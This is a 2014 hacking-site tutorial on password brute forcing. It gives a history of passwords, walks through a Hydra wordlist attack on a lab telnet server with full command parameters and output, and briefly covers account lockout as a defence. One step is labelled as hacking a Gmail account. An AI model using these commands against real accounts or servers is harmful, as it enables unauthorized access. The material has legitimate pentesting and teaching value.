The famous Brute Force
The brute force is the principle of multiple login attempts and is usually applied to get access to accounts on a given site, service, server, etc.
Automated or with the aid of software, it is an algorithm tested to ensure access to the target, which is to enumerate all possible keys of a solution and verify that each satisfies the problem and enters the exploited system.
Readers, in this method, we will use what we call "WorldList"; Words that are found in the dictionary and can be used in the art of "brute force", because unfortunately there are many people who use simple words for username and password, as well as the anniversary date of marriage, name of their children or puppies, cities, car models… Many first attackers use social engineering (malicious conversation in order to obtain interests) to know the tastes of their targets and thus have efficiency in attacks both in emails and bank account.
The system login and password is one of the oldest and most functional safety schemes that exist. The history of the use of passwords is very old, dating back to the Middle Ages where owners fortresses commandeer a keyword so that people could enter when told the correct word. In the 60s began to intensify research and development of new technologies. It was there that appeared robust, multi-user operating systems. To be able to differentiate people and prevent anyone can have access to computers, MIT scientists have implemented the scheme of "keyword" to the virtual world. It was there that the first screens emerged login and password. But in addition to creating a scheme that prevents the use of computers by unauthorized persons, there must be a relatively safe means of authentication at login, that prevents the action of the smartest.
HOW WORKS BRUTEFORCE
I'll tell a simple story that will help clarify your ideas and understand how it works.
To illustrate, let's imagine that you need to go into a certain room in hands you have three keys that fit the lock, but none of them opens the door, but you still need to enter. There are two ways to enter the room without having the correct key. The first is to call a locksmith to open it the door in question, while the second is to use brute force and break the door.
MOVEMENT AND ACTION
Readers, this article will demonstrate the attack with German software, “Hydra” is an excellent tool to make attacks to test the security attacks can be performed through a list of words "wordlist" containing potential users or passwords. Why it is important to emphasize that maintain updated documentation of systems, equipment, applications is critical.
NOTES OF AUTHOR:
Some security experts prefer to develop their own softwares for pentest and security in general, I develop a tool in perl you can test through the password contained in this document.
STEP BY STEP
Gentlemen, I chose to demonstrate this technique using the Hydra tool because it is effective and very fast, you can put in your password millions (Wordlist) and test all in a short time. Another reason is that Hydra supports multiple protocols. I'll show attack the TELNET and SMTP.
Image1) Create your wordlist.txt , edit and save.
Image2) Use the command “hydra” for information.
Hydra –S –l [email protected] –P
Image3) Hacking Gmail account.
Image4) Password found.
Let’s doing on TELNET ;)
$ hydra -s 23 -l rafael -P PASSFILE.txt -o LogFile.txt -4 -V 192.168.1.140 telnet
We now consider all passed the tool parameters.
Ps: I used the maximum parameters for the demonstration…
• hydra Software used in the attack
• 23 –s Port used (if the admin change)
•-l rafael The user (if not know, use the-L option with the list of possible names)
• -P PASSFILE.TXT List of possible passwords(Millions)
• -o LogFile.txt Log created with data
• -4 IP version 4 (if the v6, use "-6")
•-V verbose mode (shows the process running)
• 192.168.1.140: IP target. (Virtual Machine)
• telnet Server I decided to attack…
The following is displayed:
Hydra (http://www.thc.org/thc-hydra) starting at 2014-04-14 03:02:16
[WARNING] telnet is by its nature unreliable to analyze reliable, if possible better choose FTP or SSH if available
[DATA] 9 tasks, 1 server, 9 login tries (l:1/p:9), ~1 try per task
[DATA] attacking service telnet on port 23
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "111" - 1 of 9 [child 0]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "222" - 2 of 9 [child 1]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "333" - 3 of 9 [child 2]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "444" - 4 of 9 [child 3]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "555" - 5 of 9 [child 4]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "666" - 6 of 9 [child 5]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "777" - 7 of 9 [child 6]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "888" - 8 of 9 [child 7]
[ATTEMPT] target 192.168.1.140 - login "rafael" - pass "999" - 9 of 9 [child 8]
[telnet] host: 192.168.1.140 login: rafael password: PentestMagazine
[STATUS] attack finished for 192.168.1.140 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Protection against brute force
There is a protection against brute force techniques that is effective in the case of you being a good programmer is always good to use functions that block a particular account after X login attempts and this account be released to login attempts again after X minutes therefore your website, service, server will be less prone to such attacks.
There are programmers that perform blocking the account for a certain IP, however, this technique is eventually fail if the person applying brute force use a technique called IP spoofing.
Author: CISO Rafael Fontes Souza. Copyright (c) 2014 By HackersOnlineClub (HOC)